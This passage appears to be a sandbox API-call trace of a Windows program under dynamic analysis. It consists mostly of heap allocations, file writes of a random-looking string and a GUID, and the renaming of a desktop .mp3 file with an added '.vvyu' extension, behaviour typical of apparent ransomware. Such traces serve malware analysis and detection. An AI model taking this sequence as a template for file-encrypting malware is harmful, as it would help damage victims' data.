GetCurrentThreadId () returned 0x5d8 [0199.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0199.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af5ba0 [0199.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0199.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0199.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0199.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0199.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0199.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.321] GetCurrentThreadId () returned 0x5d8 [0199.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0199.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0199.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0199.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0199.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0199.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0199.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0199.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ad0 [0199.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0199.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0199.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0199.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0199.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0199.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0199.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0199.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a70 [0199.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0199.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0199.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0199.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0199.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0199.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0199.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a88 [0199.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0199.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0199.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0199.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a58 [0199.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0199.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6ae8 [0199.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0199.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ab8 [0199.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6aa0 [0199.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0199.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b00 [0199.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6aa0 | out: hHeap=0x2c0000) returned 1 [0199.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6aa0 [0199.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ab8 | out: hHeap=0x2c0000) returned 1 [0199.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0199.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0199.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0199.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0199.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0199.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a70 | out: hHeap=0x2c0000) returned 1 [0199.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a70 [0199.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0199.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8d8 [0199.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ad0 | out: hHeap=0x2c0000) returned 1 [0199.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0199.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0199.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0199.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0199.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0199.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0199.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a70 | out: hHeap=0x2c0000) returned 1 [0199.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0199.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0199.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0199.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0199.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0199.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0199.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0199.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0199.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0199.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6aa0 | out: hHeap=0x2c0000) returned 1 [0199.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0199.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0199.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a88 | out: hHeap=0x2c0000) returned 1 [0199.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a58 | out: hHeap=0x2c0000) returned 1 [0199.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0199.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0199.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0199.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a40 | out: hHeap=0x2c0000) returned 1 [0199.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade8a8 | out: hHeap=0x2c0000) returned 1 [0199.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8d8 | out: hHeap=0x2c0000) returned 1 [0199.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0199.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0199.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0199.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0199.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0199.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0199.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0199.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0199.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.332] WriteFile (in: hFile=0x584, lpBuffer=0x2af7168*, nNumberOfBytesToWrite=0xa29a, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af7168*, lpNumberOfBytesWritten=0x2f9fb14*=0xa29a, lpOverlapped=0x0) returned 1 [0199.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af7168 | out: hHeap=0x2c0000) returned 1 [0199.333] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xa29f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.333] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0199.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0199.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e0 [0199.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0199.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0199.334] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.335] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.335] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.335] CloseHandle (hObject=0x584) returned 1 [0199.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8f50 [0199.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0199.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8f50 | out: hHeap=0x2c0000) returned 1 [0199.338] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\_dSq\\YWYWXYtY.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\_dsq\\ywywxyty.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\_dSq\\YWYWXYtY.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\_dsq\\ywywxyty.mp3.vvyu")) returned 1 [0199.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.340] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0199.343] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4105140, ftCreationTime.dwHighDateTime=0x1d89b62, ftLastAccessTime.dwLowDateTime=0x3ee24510, ftLastAccessTime.dwHighDateTime=0x1d8a000, ftLastWriteTime.dwLowDateTime=0x3ee24510, ftLastWriteTime.dwHighDateTime=0x1d8a000, nFileSizeHigh=0x0, nFileSizeLow=0xa29f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YWYWXYtY.mp3", cAlternateFileName="")) returned 0 [0199.343] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0199.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0199.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31ba80 | out: hHeap=0x2c0000) returned 1 [0199.344] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0199.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8f50 [0199.344] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0199.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0199.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: 